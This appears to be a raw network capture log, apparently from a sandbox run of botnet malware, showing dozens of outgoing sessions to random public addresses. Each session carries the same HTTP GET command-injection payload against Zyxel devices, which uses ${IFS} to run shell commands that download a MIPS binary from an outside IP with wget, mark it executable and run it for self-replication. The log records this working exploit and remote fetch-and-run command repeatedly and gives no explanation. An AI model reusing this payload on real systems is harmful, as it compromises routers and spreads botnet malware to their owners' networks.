                                          Jan 14, 2024 15:45:52.663065910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          305192.168.2.2351556155.137.98.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663084030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          306192.168.2.234838042.77.191.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663090944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          307192.168.2.2347142128.75.173.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663110018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          308192.168.2.2358748167.171.137.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663114071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          309192.168.2.234162853.244.46.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663136005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          310192.168.2.2344350182.30.164.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663158894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          311192.168.2.2354550120.63.64.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663230896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          312192.168.2.2347792206.87.18.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663240910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          313192.168.2.234943848.66.128.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663261890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          314192.168.2.233444027.187.43.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663317919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          315192.168.2.236085292.202.39.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663453102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          316192.168.2.2334516211.103.219.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663491964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          317192.168.2.2339732201.120.105.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663501024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          318192.168.2.2350324223.254.83.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663501978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          319192.168.2.233337850.179.11.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663613081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          320192.168.2.234423086.252.88.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:53.667815924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          321192.168.2.2357618107.140.78.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:53.667846918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          322192.168.2.2346330190.245.130.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:53.667905092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          323192.168.2.2351870149.17.76.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670156956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          324192.168.2.235513651.230.189.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670192957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          325192.168.2.234598441.88.120.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670207977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          326192.168.2.2350092182.179.85.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670303106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          327192.168.2.235610073.66.160.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670352936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          328192.168.2.2354942138.75.48.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670360088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          329192.168.2.234498450.1.143.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670383930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          330192.168.2.2351876111.11.231.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670422077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          331192.168.2.2359530193.184.241.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670473099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          332192.168.2.2344970144.95.197.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670547009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          333192.168.2.235165634.10.116.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670572996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          334192.168.2.235149291.73.109.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670593023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          335192.168.2.2337108105.224.56.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670639038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          336192.168.2.2341882117.75.254.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670640945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          337192.168.2.233913866.255.217.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670698881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          338192.168.2.2342382156.125.77.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670706987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          339192.168.2.2358598218.166.32.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670737028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          340192.168.2.2349392118.3.124.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670763016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          341192.168.2.233536246.74.61.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670787096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          342192.168.2.2346802218.162.149.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670824051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          343192.168.2.2335128143.214.206.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:54.670895100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          344192.168.2.2334976167.94.14.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673840046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          345192.168.2.2348806126.208.154.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673882961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          346192.168.2.2344162197.142.13.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673912048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          347192.168.2.2353628130.167.204.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673912048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          348192.168.2.2336826204.219.130.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673923016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          349192.168.2.235969095.205.16.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673929930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          350192.168.2.2342130186.22.190.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673929930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          351192.168.2.2346346112.6.191.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.673976898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          352192.168.2.2340870153.43.235.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.674038887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          353192.168.2.235785872.208.229.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.674067974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          354192.168.2.236067899.151.13.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.674072981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          355192.168.2.236072627.146.247.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.674091101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          356192.168.2.2345148118.216.91.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:55.674108028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          357192.168.2.2334562149.203.90.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676696062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          358192.168.2.2347054180.75.190.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676726103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          359192.168.2.235904631.110.23.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676736116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          360192.168.2.2358296191.44.228.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676769972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          361192.168.2.2345166156.238.76.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676770926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          362192.168.2.234999225.59.135.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676795006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          363192.168.2.2341432108.154.79.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676830053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          364192.168.2.2353144212.38.7.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676883936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          365192.168.2.235301232.117.168.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676887035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          366192.168.2.235143044.73.223.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676887035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          367192.168.2.2351170137.154.190.73443
                                          TimestampBytes transferredDirectionData
